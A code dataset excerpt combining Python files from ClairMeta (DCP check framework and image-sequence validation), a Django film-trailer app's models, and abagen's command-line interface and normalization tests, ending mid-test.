class CheckerBase(object):
""" Base class for check module, provide check discover and run utilities.
All check module shall derive from this class.
"""
def __init__(self, dcp, profile):
""" CheckerBase constructor.
Args:
dcp (clairmeta.DCP): DCP object.
profile (dict): Checker profile.
"""
self.dcp = dcp
self.check_profile = profile
self.check_log = get_log()
self.check_executions = []
self.check_report = {}
self.hash_callback = None
def find_check_criticality(self, name):
""" Find criticality of a particular check (using profile).
Args:
name (str): Name of the check function.
Returns:
Criticality level string.
"""
check_level = self.check_profile['criticality']
default = check_level.get('default', 'ERROR')
score_profile = {
0: default
}
for c_name, c_level in six.iteritems(check_level):
if name.startswith(c_name):
score_profile[len(c_name)] = c_level
return score_profile[max(score_profile.keys())]
def find_check(self, prefix):
""" Discover checks functions (using introspection).
Args:
prefix (str): Prefix of the checks to find (excluding leading
'check_').
Returns:
List of check functions.
"""
member_list = inspect.getmembers(self, predicate=inspect.ismethod)
bypass = self.check_profile['bypass']
checks = []
for k, v in member_list:
check_prefix = k.startswith('check_' + prefix)
check_bypass = any([k.startswith(c) for c in bypass])
if check_prefix and not check_bypass:
checks.append(v)
return checks
def find_check_failed(self):
""" Returns a list of all failed checks. """
return [c for c in self.check_executions if not c.valid]
def run_check(self, check, *args, **kwargs):
""" Execute a check.
Args:
check (tuple): Tuple (function name, function).
*args: Variable list of check function arguments.
**kwargs: Variable list of keyword arguments.
error_prefix (str): error message prefix
Returns:
Tuple (status, return_value)
"""
start = time.time()
name, func = check.__name__, check
check_exec = CheckExecution(name)
check_exec.doc = check.__doc__
check_res = None
try:
check_res = func(*args)
check_exec.valid = True
check_exec.msg = "Check valid"
except CheckException as e:
if kwargs.get('error_prefix'):
msg = "{}\n\t{}".format(kwargs.get('error_prefix'), str(e))
else:
msg = str(e)
check_exec.msg = msg
check_exec.criticality = self.find_check_criticality(name)
except Exception as e:
check_exec.msg = "Check unknown error\n{}".format(
traceback.format_exc())
check_exec.criticality = "ERROR"
self.check_log.error(check_exec.msg)
finally:
check_exec.asset_stack = kwargs.get('stack', [self.dcp.path])
check_exec.seconds_elapsed = time.time() - start
self.check_executions.append(check_exec)
return check_exec.valid, check_res
def make_report(self):
""" Check report generation. """
self.check_report = {
'ERROR': [],
'WARNING': [],
'INFO': [],
'SILENT': []
}
for c in self.find_check_failed():
self.check_report[c.criticality].append((c.name, c.msg))
check_unique = set([c.name for c in self.check_executions])
self.check_elapsed = {}
self.total_time = 0
self.total_check = len(check_unique)
for name in check_unique:
execs = [c.seconds_elapsed
for c in self.check_executions if c.name == name]
elapsed = sum(execs)
self.total_time += elapsed
self.check_elapsed[name] = elapsed
def dump_report(self):
""" Dump check report. """
valid_str = 'Success' if self.get_valid() else 'Fail'
pretty_status = {
'ERROR': 'Error(s)',
'WARNING': 'Warning(s)',
'INFO': 'Info(s)',
'SILENT': 'Suppressed(s)',
'BYPASS': 'Bypass(s)',
}
map_status = {
'ERROR': {},
'WARNING': {},
'INFO': {},
'SILENT': {},
}
# Accumulate all failed checks and stack them by asset
for c in self.find_check_failed():
node = map_status[c.criticality]
for filename in c.asset_stack:
if filename not in node:
node[filename] = {}
node = node[filename]
if 'messages' not in node:
node['messages'] = []
docstring_lines = c.doc.split('\n')
desc = docstring_lines[0] if docstring_lines else c.name
node['messages'] += ['.' + desc + '\n' + c.msg]
self.check_log.info("DCP : {}".format(self.dcp.path))
self.check_log.info("Size : {}".format(human_size(self.dcp.size)))
for status, vals in six.iteritems(map_status):
out_stack = []
for k, v in six.iteritems(vals):
out_stack += [self.dump_stack("", k, v, indent_level=0)]
if out_stack:
self.check_log.info("{}\n{}".format(
pretty_status[status] + ':',
"\n".join(out_stack)))
if self.check_profile['bypass']:
checks_str = ' ' + '\n '.join(self.check_profile['bypass'])
self.check_log.info("{}\n{}".format(
pretty_status['BYPASS'] + ':', checks_str))
self.check_log.info("Total check : {}".format(self.total_check))
self.check_log.info("Total time : {:.2f} sec".format(self.total_time))
self.check_log.info("Validation : {}\n".format(valid_str))
def dump_stack(self, out_str, key, values, indent_level):
""" Recursively iterate through the error message stack.
Args:
out_str (str): Accumulate messages to ``out_str``
key (str): Filename of the current asset.
values (dict): Message stack to dump.
indent_level (int): Current indentation level.
Returns:
Output error message string
"""
indent_offset = 2
indent_step = 2
indent_char = ' '
ind = indent_offset + indent_level
filename = key
desc = self.title_from_filename(filename)
messages = values.pop('messages', [])
out_str = '' if indent_level == 0 else '\n'
out_str += indent_char * ind + '+ '
out_str += filename
out_str += ' ' + desc if desc else ''
ind += indent_step
for m in messages:
out_str += "\n"
out_str += indent_char * ind
# Correct indentation for multi-lines messages
out_str += ("\n" + indent_char * (ind + 2)).join(m.split("\n"))
ind -= indent_step
for k, v in six.iteritems(values):
out_str += self.dump_stack(
out_str, k, v, indent_level + indent_step)
return out_str
def title_from_filename(self, filename):
""" Returns a human friendly title for the given file. """
for cpl in self.dcp._list_cpl:
if cpl['FileName'] == filename:
desc = "({})".format(
cpl['Info']['CompositionPlaylist'].get(
'ContentTitleText', ''))
return desc
for pkl in self.dcp._list_pkl:
if pkl['FileName'] == filename:
desc = "({})".format(
pkl['Info']['PackingList'].get('AnnotationText', ''))
return desc
return ''
def get_valid(self):
""" Check status is valid. """
return self.check_report['ERROR'] == []
```
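To make the discovery/run/report flow above concrete, here is a hedged sketch of a minimal checker built on `CheckerBase`; the `DummyDCP` object, the `check_demo_*` methods, and the profile dictionary are invented for this example and are not ClairMeta fixtures (the import assumes the package is installed).
```python
from clairmeta.dcp_check_base import CheckerBase, CheckException

class DummyDCP(object):
    """Illustration-only stand-in for a clairmeta.DCP object."""
    path = "/tmp/fake_dcp"
    size = 0
    _list_cpl = []
    _list_pkl = []

class MyChecker(CheckerBase):
    def check_demo_always_fails(self):
        """ Example check that always fails. """
        raise CheckException("Something went wrong")

    def check_demo_always_passes(self):
        """ Example check that always passes. """
        return True

profile = {"criticality": {"default": "ERROR"}, "bypass": []}

checker = MyChecker(DummyDCP(), profile)
for check in checker.find_check("demo"):
    checker.run_check(check)
checker.make_report()
print(checker.get_valid())  # False: the failing check is reported as an ERROR
```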
#### File: ClairMeta/clairmeta/sequence_check.py
```python
import os
from clairmeta.settings import SEQUENCE_SETTINGS
from clairmeta.utils.sys import number_is_close
from clairmeta.utils.file import parse_name
def check_sequence(path, allowed_extensions, ignore_files=None, ignore_dirs=None):
""" Check image file sequence coherence recursively.
Args:
path (str): Base directory path.
allowed_extensions (dict): Dictionary mapping extensions.
ignore_files (list): List of files name to ignore.
ignore_dirs (list): List of directory name to ignore.
Raises:
ValueError: If ``path`` is not a valid directory.
ValueError: If ``path`` is an empty directory.
ValueError: If ``allowed_extensions`` is not a dictionary.
"""
if not os.path.isdir(path):
raise ValueError("Folder not found : {}".format(path))
if not os.listdir(path):
raise ValueError("Empty folder")
if not isinstance(allowed_extensions, dict):
raise ValueError("Wrong arguments, allowed_extensions must be a dict")
for dirpath, dirnames, filenames in os.walk(path, topdown=True):
# Filter out explicitly ignored files
if ignore_files:
filenames = [f for f in filenames if f not in ignore_files]
if ignore_dirs:
# Why dirnames[:] ? Quote from the documentation :
# When topdown is True, the caller can modify the dirnames list
# in-place (perhaps using del or slice assignment).
dirnames[:] = [d for d in dirnames if d not in ignore_dirs]
# No files in folder, nothing to check..
if not filenames:
continue
# First file in folder is the reference
check_sequence_folder(dirpath, filenames, allowed_extensions)
def check_sequence_folder(dirpath, filenames, allowed_extensions):
""" Check image file sequence coherence.
This function checks :
- Image extension and Mime type is authorized
- No jumps (missing frames) are found in the whole sequence
- All images must have the same file name (excluding index)
- All images must have the same extension and Mime type
- All images must have the same size (we work on uncompressed files
only)
Args:
dirpath (str): Directory path.
filenames (list): List of files to check in ``dirpath``.
allowed_extensions (dict): Dictionary mapping extensions.
Raises:
ValueError: If image file sequence check failed.
"""
settings = SEQUENCE_SETTINGS['ALL']
size_rtol = settings['size_diff_tol'] / 1e2
# First file in folder is the reference
fileref = filenames[0]
fullpath_ref = os.path.join(dirpath, fileref)
filename, idx = parse_name(fileref)
filesize = os.path.getsize(fullpath_ref)
extension = os.path.splitext(fileref)[-1]
sequence_idx = [idx]
# Check that this reference is conform
if extension not in allowed_extensions:
raise ValueError('extension {} not authorized'.format(extension))
# Then check that all subsequent files are identical
for f in filenames[1:]:
fullpath = os.path.join(dirpath, f)
current_ext = os.path.splitext(f)[-1]
current_filename, current_idx = parse_name(f)
current_filesize = os.path.getsize(fullpath)
sequence_idx.append(current_idx)
if current_filename != filename:
raise ValueError('Filename difference, {} but expected {}'
.format(current_filename, filename))
if current_ext != extension:
raise ValueError('File extension difference, {} but expected {}'
.format(current_ext, extension))
if not number_is_close(current_filesize, filesize, rtol=size_rtol):
raise ValueError(
'{} : file size difference got {} but expected {}'
' - tolerance of {}%'.format(
current_filename, current_filesize,
filesize, settings['size_diff_tol']))
# Check for jump in sequence (ie. missing frame(s))
sequence_idx.sort()
for idx, fno in enumerate(sequence_idx, sequence_idx[0]):
if idx != fno:
raise ValueError(
'File sequence jump found, file {} not found'.format(idx))
```
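A hedged usage sketch of the sequence checker above; the folder path and the extension-to-MIME map are illustrative assumptions and must match your own image sequence layout (the import assumes the package is installed).
```python
from clairmeta.sequence_check import check_sequence

# Placeholder extension map; keys must include the leading dot because the
# checker compares them against os.path.splitext() output.
allowed = {".tiff": "image/tiff", ".dpx": "image/x-dpx"}

try:
    check_sequence(
        "/path/to/image/sequences",     # assumed root folder
        allowed,
        ignore_files=["Thumbs.db", ".DS_Store"],
        ignore_dirs=["__MACOSX"],
    )
    print("Sequence looks coherent")
except ValueError as err:
    print("Sequence check failed: {}".format(err))
```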
#### File: ClairMeta/tests/test_profile.py
```python
import unittest
import os
from clairmeta.utils.file import temporary_file
from clairmeta.profile import load_profile, save_profile, get_default_profile
class ProfileTest(unittest.TestCase):
def get_file_path(self, name):
file_path = os.path.join(
os.path.dirname(__file__),
'resources', name)
return file_path
def test_load_profile(self):
p = load_profile(self.get_file_path('myprofile.json'))
self.assertEqual(p['log_level'], 'INFO')
self.assertEqual(p['bypass'], ["check_assets_pkl_hash"])
self.assertEqual(p['criticality']['default'], 'ERROR')
def test_save_profile(self):
with temporary_file(suffix='.json') as f:
p_gold = get_default_profile()
save_profile(p_gold, f)
p = load_profile(f)
self.assertEqual(p, p_gold)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "4lm/trailer",
"score": 2
} |
#### File: trailer/trailerapp/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from PIL import ExifTags, Image
class Genre(models.Model):
tmdb_id = models.IntegerField(unique=True)
name = models.CharField(max_length=64)
def __str__(self):
return self.name
__repr__ = __str__
class Film(models.Model):
title = models.CharField(max_length=255)
original_title = models.CharField(max_length=255, null=True)
language = models.CharField(max_length=8, null=True) # iso_639_1
original_language = models.CharField(max_length=8, null=True) # iso_639_1
region = models.CharField(max_length=8, null=True) # iso_3166_1
overview = models.TextField(null=True)
release_date = models.DateTimeField(null=True)
tmdb_id = models.CharField(max_length=64, null=True, unique=True)
vote_average = models.FloatField(null=True)
vote_count = models.IntegerField(null=True)
backdrop_path = models.CharField(max_length=255, null=True)
poster_path = models.CharField(max_length=255, null=True)
genre = models.ManyToManyField(Genre)
def __str__(self):
return self.title
__repr__ = __str__
class Trailer(models.Model):
title = models.CharField(max_length=255)
film = models.ForeignKey(Film, on_delete=models.CASCADE)
tmdb_id = models.CharField(max_length=64, null=True, unique=True)
language = models.CharField(max_length=8, null=True) # iso_639_1
region = models.CharField(max_length=8, null=True) # iso_3166_1
site = models.CharField(max_length=64, null=True) # origin of video
site_key = models.CharField(max_length=64, null=True) # key of video at origin
type = models.CharField(max_length=10, null=True) # Trailer|Teaser
date_added = models.DateTimeField(null=True)
def __str__(self):
return self.title
__repr__ = __str__
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
image = models.ImageField(default='default.jpg', upload_to='profile_pics')
def __str__(self):
return '{} Profile'.format(self.user.username)
__repr__ = __str__
def save(self, force_insert=False, force_update=False, using=None):
super().save()
img = Image.open(self.image.path)
try:
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
exif = dict(img._getexif().items())
if exif[orientation] == 3:
img = img.rotate(180, expand=True)
elif exif[orientation] == 6:
img = img.rotate(270, expand=True)
elif exif[orientation] == 8:
img = img.rotate(90, expand=True)
img.save(self.image.path)
except (AttributeError, KeyError, IndexError):
# cases: image doesn't have EXIF data (_getexif)
pass
max_width, max_height = 300, 300
if img.height > max_height or img.width > max_width:
if img.height >= img.width:
aspect_ratio = img.height / img.width
output_size = (max_width, max_height * aspect_ratio)
else:
aspect_ratio = img.width / img.height
output_size = (max_width * aspect_ratio, max_height)
img.thumbnail(output_size)
if img.height != img.width:
width, height = img.size
left = (width - max_width) / 2
top = (height - max_height) / 2
right = (width + max_width) / 2
bottom = (height + max_height) / 2
cropped_img = img.crop((left, top, right, bottom))
cropped_img.save(self.image.path)
else:
img.save(self.image.path)
img.close()
``` |
{
"source": "4lovi4/abagen",
"score": 3
} |
#### File: abagen/cli/run.py
```python
import argparse
import logging
import os
from pathlib import Path
import sys
lgr = logging.getLogger('abagen')
def _resolve_path(path):
""" Helper function for get_parser() to resolve paths
"""
if path is not None:
try:
return str(Path(path).expanduser().resolve())
except FileNotFoundError:
return os.path.abspath(os.path.expanduser(path))
def _resolve_none(inp):
""" Helper function to allow 'None' as input from argparse
"""
if inp == "None":
return
return inp
class CheckExists(argparse.Action):
""" Helper class to check that provided paths exist
"""
def __call__(self, parser, namespace, values, option_string=None):
values = self.type(values)
if not os.path.exists(_resolve_path(values)):
parser.error('Provided value for {} does not exist: {}'
.format(option_string, values))
setattr(namespace, self.dest, values)
def get_parser():
""" Gets command-line arguments for primary get_expression_data workflow
"""
from .. import __version__
from ..correct import NORMALIZATION_METHODS
from ..probes_ import SELECTION_METHODS
verstr = 'abagen {}'.format(__version__)
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="""
Assigns microarray expression data to ROIs defined in the specific `atlas`
This command aims to provide a workflow for generating pre-processed microarray
expression data from the Allen Human Brain Atlas for arbitrary atlas
designations. First, some basic filtering of genetic probes is performed,
including:
1. Intensity-based filtering of microarray probes to remove probes that do
not exceed a certain level of background noise (specified via the
`ibf_threshold` parameter), and
2. Selection of a single, representative probe (or collapsing across
probes) for each gene, specified via the `probe_selection` parameter.
Tissue samples are then matched to parcels in the defined `atlas` for each
donor. If `atlas_info` is provided then this matching is constrained by both
hemisphere and tissue class designation (e.g., cortical samples from the left
hemisphere are only matched to ROIs in the left cortex, subcortical samples
from the right hemisphere are only matched to ROIs in the right subcortex); see
the `atlas_info` parameter description for more information.
Matching of microarray samples to parcels in `atlas` is done via a multi-step
process:
1. Determine if the sample falls directly within a parcel,
2. Check to see if there are nearby parcels by slowly expanding the search
space to include nearby voxels, up to a specified distance (specified
via the `tolerance` parameter),
3. If there are multiple nearby parcels, the sample is assigned to the
closest parcel, as determined by the parcel centroid.
If at any step a sample can be assigned to a parcel the matching process is
terminated. If multiple samples are assigned to the same parcel they are
aggregated with the metric specified via the `agg_metric` parameter. More
control over the sample matching can be obtained by setting the `inexact`
parameter; see the parameter description for more information.
Once all samples have been matched to parcels for all supplied donors, the
microarray expression data are optionally normalized via the provided
`sample_norm` and `gene_norm` functions before being combined within parcels
and across donors via the supplied `agg_metric`.
"""
)
parser.add_argument('atlas', action=CheckExists, type=_resolve_path,
help='An image in MNI space, where each parcel in the '
'image is identified by a unique integer ID.')
# because I like consistency in capitalization and punctuation...
for act in parser._actions:
if isinstance(act, argparse._HelpAction):
act.help = act.help.capitalize() + '.'
break
parser.add_argument('--version', action='version', version=verstr,
help='Show program\'s version number and exit.')
parser.add_argument('-v', '--verbose', action='count', default=1,
help='Increase verbosity of status messages to '
'display during workflow.')
parser.add_argument('-q', '--quiet', action='store_true', default=False,
help='Suppress all status messages during workflow.')
parser.add_argument('--debug', action='store_true', help=argparse.SUPPRESS)
a_data = parser.add_argument_group('Options to specify information about '
'the atlas used')
a_data.add_argument('--atlas_info', '--atlas-info', action=CheckExists,
type=_resolve_path, default=None, metavar='PATH',
help='Filepath to CSV files containing information '
'about `atlas`. The CSV file must have at least '
'columns ["id", "hemisphere", "structure"] which '
'contain information mapping the atlas IDs to '
'hemispheres (i.e, "L", "R") and broad '
'structural groups (i.e., "cortex", "subcortex", '
'"cerebellum", "brainstem").')
g_data = parser.add_argument_group('Options to specify which AHBA data to '
'use during processing')
g_data.add_argument('--donors', action='store', nargs='+',
default='all', metavar='DONOR_ID',
help='List of donors to use as sources of expression '
'data. Specified IDs can be either donor numbers '
'(i.e., 9861, 10021) or UIDs (i.e., H0351.2001). '
'Can specify "all" to use all available donors. '
'Default: "all"')
g_data.add_argument('--data_dir', '--data-dir', action=CheckExists,
type=_resolve_path, metavar='PATH',
help='Directory where expression data should be '
'downloaded to (if it does not already exist) / '
'loaded from. If not specified this will check '
'the environmental variable $ABAGEN_DATA, the '
'$HOME/abagen-data directory, and the current '
'working directory. If data does not already '
'exist at one of those locations then it will be '
'downloaded to the first of these location that '
'exists and for which write access is enabled.')
w_data = parser.add_argument_group('Options to specify processing options')
w_data.add_argument('--inexact', dest='exact', action='store_false',
default=True,
help='Whether to use inexact matching of donor tissue '
'samples to parcels in `atlas`. By default, the '
'workflow will match tissue samples to parcels '
'within `tolerance` mm of the sample; any '
'samples that are beyond `tolerance` mm of a '
'parcel will be discarded, which may result in '
'some parcels having no assigned sample / '
'expression data. If --inexact, the matching '
'procedure will be performed and followed by a '
'check for parcels with no assigned samples; any '
'such parcels will be matched to the nearest '
'sample (defined as the sample with the closest '
'Euclidean distance to the parcel centroid). '
'Default: False')
w_data.add_argument('--tol', '--tolerance', dest='tolerance',
action='store', type=float, default=2,
help='Distance (in mm) that a sample can be from a '
'parcel for it to be matched to that parcel. '
'This is only considered if the sample is not '
'directly within a parcel. Default: 2')
w_data.add_argument('--ibf_threshold', '--ibf-threshold', action='store',
default=0.5, metavar='THRESHOLD',
help='Threshold for intensity-based filtering of '
'probes. This number should specify the ratio of '
'samples, across all supplied donors, for which '
'a probe must have signal above background noise '
'in order to be retained. Default: 0.5')
w_data.add_argument('--region_agg', '--region-agg', action='store',
default='donors', metavar='METHOD',
choices=['donors', 'samples'],
help='When multiple samples are identified as '
'belonging to a region in `atlas` this '
'determines how they are aggregated. If '
'\'samples\', expression data from all samples '
'for all donors assigned to a given region are '
'combined. If \'donors\', expression values for '
'all samples assigned to a given region are '
'combined independently for each donor before '
'being combined across donors. See `agg_metric` '
'for mechanism by which samples are combined. '
'Default: \'donors\'')
w_data.add_argument('--agg_metric', '--agg-metric', action='store',
default='mean', metavar='METHOD',
choices=['mean', 'median'],
help='Mechanism by which to (1) reduce expression '
'data of multiple samples in the same `atlas` '
'region, and (2) reduce donor-level expression '
'data into a single "group" expression '
'dataframe. Must be one of {"mean", "median"}. '
'Default: "mean"')
w_data.add_argument('--probe_selection', '--probe-selection',
action='store', default='diff_stability',
metavar='METHOD', choices=sorted(SELECTION_METHODS),
help='Selection method for subsetting (or collapsing '
'across) probes that index the same gene. Must '
'be one of {"average", "mean", "max_intensity", '
'"max_variance", "pc_loading", "corr_variance", '
'"corr_intensity", "diff_stability", "rnaseq"}. '
'Default: "diff_stability"')
w_data.add_argument('--lr_mirror', '--lr-mirror', action='store_true',
help='Whether to mirror microarray expression samples '
'across hemispheres to increase spatial '
'coverage. This will duplicate samples across '
'both hemispheres (i.e., L->R and R->L), '
'approximately doubling the number of available '
'samples. Default: False (i.e., no mirroring)')
w_data.add_argument('--gene_norm', '--gene-norm', action='store',
default='srs', metavar='METHOD', type=_resolve_none,
choices=sorted(NORMALIZATION_METHODS) + ['None', None],
help='Method by which to normalize microarray '
'expression values for each donor prior to '
'collapsing across donors. Expression values are '
'normalized separately for each gene for each '
'donor across all expression samples. If None is '
'specified then no normalization is performed. '
'Default: "srs"')
w_data.add_argument('--sample_norm', '--sample-norm', action='store',
default='srs', metavar='METHOD', type=_resolve_none,
choices=sorted(NORMALIZATION_METHODS) + ['None', None],
help='Method by which to normalize microarray '
'expression values for each sample prior to '
'collapsing into regions in `atlas`. Expression '
'values are normalized separately for each '
'sample and donor across genes. If None is '
'specified then no normalization is performed. '
'Default: "srs"')
p_data = parser.add_argument_group('Options to modify the AHBA data used')
p_data.add_argument('--no-reannotated', '--no_reannotated',
dest='reannotated', action='store_false', default=True,
help='Whether to use the original probe information '
'from the AHBA dataset instead of the '
'reannotated probe information from '
'Arnatkevic̆iūtė et al., 2019. Using reannotated '
'probe information discards probes that could '
'not be reliably matched to genes. Default: '
'False (i.e., use reannotations)')
p_data.add_argument('--no-corrected-mni', '--no_corrected_mni',
dest='corrected_mni', action='store_false',
default=True,
help='Whether to use the original MNI coordinates '
'provided with the AHBA data instead of the '
'"corrected" MNI coordinates shipped with the '
'`alleninf` package when matching tissue samples '
'to anatomical regions. Default: False (i.e., '
'use corrected coordinates)')
o_data = parser.add_argument_group('Options to modify how data are output')
o_data.add_argument('--stdout', action='store_true',
help='Generated region x gene dataframes will be '
'printed to stdout for piping to other things. '
'You should REALLY consider just using --output-'
'file instead and working with the generated '
'CSV file(s). Incompatible with `--save-counts` '
'and `--save-donors` (i.e., this will override '
'those options). Default: False')
o_data.add_argument('--output-file', '--output_file', action='store',
type=_resolve_path, metavar='PATH',
default='abagen_expression.csv',
help='Path to desired output file. The generated '
'region x gene dataframe will be saved here. '
'Default: $PWD/abagen_expression.csv')
o_data.add_argument('--save-counts', '--save_counts', action='store_true',
help='Whether to save dataframe containing number of '
'samples from each donor that were assigned '
'to each region in `atlas`. If specified, will '
'be saved to the path specified by '
'`output-file`, appending "counts" to the end of '
'the filename. Default: False')
o_data.add_argument('--save-donors', '--save_donors', action='store_true',
help='Whether to save donor-level expression '
'dataframes instead of aggregating expression '
'across donors with provided `agg_metric`. If '
'specified, dataframes will be saved to path '
'specified by `output-file`, appending donor IDs '
'to the end of the filename. Default: False')
return parser
def main(args=None):
""" Runs primary get_expression_data workflow
"""
from ..allen import get_expression_data
from ..datasets import WELL_KNOWN_IDS as donors
opts = get_parser().parse_args(args)
# quiet overrides any verbosity setting
if opts.quiet:
opts.verbose = 0
# debugging is fun
if opts.debug:
print(opts)
return
# run the workflow
expression = get_expression_data(atlas=opts.atlas,
atlas_info=opts.atlas_info,
exact=opts.exact,
tolerance=opts.tolerance,
region_agg=opts.region_agg,
agg_metric=opts.agg_metric,
ibf_threshold=opts.ibf_threshold,
probe_selection=opts.probe_selection,
lr_mirror=opts.lr_mirror,
gene_norm=opts.gene_norm,
sample_norm=opts.sample_norm,
corrected_mni=opts.corrected_mni,
reannotated=opts.reannotated,
return_counts=opts.save_counts,
return_donors=opts.save_donors,
donors=opts.donors,
data_dir=opts.data_dir,
verbose=opts.verbose)
output_path = os.path.dirname(opts.output_file)
fname_pref = os.path.splitext(os.path.basename(opts.output_file))[0]
# WHY?!?
if opts.stdout and not (opts.save_counts or opts.save_donors):
expression.to_csv(sys.stdout)
return
# expand the tuple, if needed
if opts.save_counts:
expression, counts = expression
counts_fname = os.path.join(output_path, fname_pref + '_counts.csv')
lgr.info('Saving samples counts to {}'.format(counts_fname))
counts.to_csv(counts_fname)
# determine how best to save expression output files
if opts.save_donors:
if opts.donors == 'all':
donors = list(donors.value_set('subj'))
else:
donors = [donors[f] for f in opts.donors]
# save each donor dataframe as a separate file
for donor, exp in zip(donors, expression):
exp_fname = os.path.join(output_path,
fname_pref + '_{}.csv'.format(donor))
lgr.info('Saving donor {} info to {}'.format(donor, exp_fname))
exp.to_csv(exp_fname)
else:
expression.to_csv(opts.output_file)
if __name__ == '__main__':
raise RuntimeError('abagen/cli/run.py should not be run directly.\nPlease '
'`pip install` abagen and use the `abagen` command.')
```
#### File: abagen/tests/test_correct.py
```python
import itertools
import numpy as np
import pandas as pd
import pytest
import scipy.stats as sstats
from abagen import allen, correct, io
from abagen.utils import flatten_dict
@pytest.fixture(scope='module')
def donor_expression(testfiles, atlas):
return allen.get_expression_data(atlas['image'], atlas['info'],
exact=False, return_donors=True,
donors=['12876', '15496'])
def test__unpack_tuple():
assert correct._unpack_tuple((3,)) == 3
assert correct._unpack_tuple((3, 3)) == (3, 3)
assert correct._unpack_tuple([2]) == 2
assert correct._unpack_tuple([2, 4]) == [2, 4]
assert correct._unpack_tuple(np.array([3])) == 3
assert np.all(correct._unpack_tuple(np.array([3, 3])) == [3, 3])
def test__batch():
rs = np.random.RandomState(1234)
# p-values for ANOVA should all be ~0 (large group differences) before
# batch correction
y = [rs.normal(size=(100, 1000)) + f for f in [5, 0, 0]]
assert np.allclose(sstats.f_oneway(*y)[1], 0)
# F-values for ANOVA should all be ~0 (no group differences) after batch
# correction; p-values returned here are sometimes NaN so not a good test
out = correct._batch_correct(y)
assert np.allclose(sstats.f_oneway(*out)[0], 0)
# mean expressions after correction should be ~equal
assert np.allclose([o.mean() for o in out], 1.24871965683026)
with pytest.raises(ValueError):
correct._batch_correct([y[0]])
def test__rescale():
rs = np.random.RandomState(1234)
y = rs.normal(size=(100, 1000)) + 10
out = correct._rescale(y)
# default max = 1, min =0
assert np.allclose(out.max(axis=0), 1) and np.allclose(out.min(axis=0), 0)
# can specify alternative min/max
out = correct._rescale(y, low=5, high=6)
assert np.allclose(out.max(axis=0), 6) and np.allclose(out.min(axis=0), 5)
# different axis works, too!
out = correct._rescale(y, axis=1)
assert np.allclose(out.max(axis=1), 1) and np.allclose(out.min(axis=1), 0)
@pytest.mark.parametrize('a', [0, 1])
def test__rs(a):
rs = np.random.RandomState(1234)
# create an array with a pretty ridiculous outlier effect to try and fix
y = rs.normal(size=(100, 1000))
y[0] += 1000
y[:, 0] += 1000
out = correct._rs(y, axis=a)
# max will always be less than one, min will always be greater than zero
assert np.all(out.max(axis=a) <= 1) and np.all(out.min(axis=a) >= 0)
# we should have reduced skewness / kurtosis compared to the original
assert np.all(sstats.skew(out, axis=a) < sstats.skew(y, axis=a))
assert np.all(sstats.kurtosis(out, axis=a) < sstats.kurtosis(y, axis=a))
# this is a weird test; we're gonna bin the data at 0.2 intervals and make
# sure no bins are empty. if one is something probably went wrong, right?
for low in np.arange(0, 1, 0.2):
hi = low + 0.2 + np.spacing(1) # include 1
assert np.all(np.sum(np.logical_and(out >= low, out < hi), axis=a) > 0)
@pytest.mark.parametrize('a', [0, 1])
def test__srs(a):
rs = np.random.RandomState(1234)
# create an array with a pretty ridiculous outlier effect to try and fix
y = rs.normal(size=(100, 1000))
y[0] += 1000
y[:, 0] += 1000
out = correct._srs(y, axis=a)
# max will always be one, min will always be zero
assert np.allclose(out.max(axis=a), 1) and np.allclose(out.min(axis=a), 0)
# we should have reduced skewness / kurtosis compared to the original
assert np.all(sstats.skew(out, axis=a) < sstats.skew(y, axis=a))
assert np.all(sstats.kurtosis(out, axis=a) < sstats.kurtosis(y, axis=a))
# this is a weird test; we're gonna bin the data at 0.2 intervals and make
# sure no bins are empty. if one is something probably went wrong, right?
for low in np.arange(0, 1, 0.2):
hi = low + 0.2 + np.spacing(1) # include 1
assert np.all(np.sum(np.logical_and(out >= low, out < hi), axis=a) > 0)
@pytest.mark.parametrize('method', [
'center', 'zscore', 'minmax', 'sigmoid', 'scaled_sigmoid',
'scaled_sigmoid_quantiles', 'robust_sigmoid', 'scaled_robust_sigmoid',
'mixed_sigmoid'
])
def test_normalize_expression_real(testfiles, method):
# load in data and add some NaN values for "realness"
micro = [
io.read_microarray(f).T
for f in flatten_dict(testfiles, 'microarray').values()
]
inds = [[5, 15, 25], [0, 10, 20]]
for n, idx in enumerate(inds):
micro[n].iloc[idx] = np.nan
minmax = [
'minmax', 'scaled_sigmoid', 'scaled_sigmoid_quantiles',
'scaled_robust_sigmoid', 'mixed_sigmoid'
]
out = correct.normalize_expression(micro, norm=method)
for exp, idx in zip(out, inds):
assert np.all(np.isnan(exp.iloc[idx]))
exp = exp.dropna(axis=1, how='all')
if method in minmax:
assert np.allclose(exp.max(axis=0), 1)
assert np.allclose(exp.min(axis=0), 0)
elif method == 'robust_sigmoid':
assert np.all(exp.max(axis=0) <= 1)
assert np.all(exp.min(axis=0) >= 0)
elif method in ['center', 'zscore']:
assert np.allclose(exp.mean(axis=0), 0)
if method == 'zscore':
assert np.allclose(exp.std(axis=0, ddof=1), 1)
# # batch correct: force means identical
# out = correct.normalize_expression(micro, norm='batch')
# assert np.allclose(*[e.mean(axis=0, skipna=True) for e in out])
# # the NaN values should still be there, though
# for exp, idx in zip(out, inds):
# assert np.all(np.isnan(exp.iloc[idx]))
# invalid norm parameter
with pytest.raises(ValueError):
correct.normalize_expression(micro, norm='notanorm')
# # can't do batch correction with only one donor
# with pytest.raises(ValueError):
# correct.normalize_expression(micro[0], norm='batch')
def test_remove_distance(donor_expression, atlas):
expr = pd.concat(donor_expression).groupby('label').aggregate(np.mean)
expr = expr.dropna(axis=1, how='any')
coexpr = np.corrcoef(expr)
for atlas_info in [None, atlas['info']]:
out = correct.remove_distance(coexpr, atlas['image'], atlas_info)
assert np.allclose(out, out.T)
assert isinstance(out, np.ndarray)
    # subset expression data and atlas_info
coexpr = np.corrcoef(expr.iloc[:-1])
removed_label = pd.read_csv(atlas_info).iloc[:-1]
out = correct.remove_distance(coexpr, atlas['image'], removed_label,
labels=removed_label.id)
assert np.allclose(out, out.T)
assert isinstance(out, np.ndarray)
assert len(out) == len(removed_label)
with pytest.raises(ValueError):
correct.remove_distance(np.corrcoef(expr), atlas['image'],
removed_label, labels=removed_label.id)
with pytest.raises(ValueError):
correct.remove_distance(expr, atlas['image'], atlas['info'])
def test_resid_dist():
dv = np.array([1, 2, 3, 4, 5])
# residualizing against self should yield 0
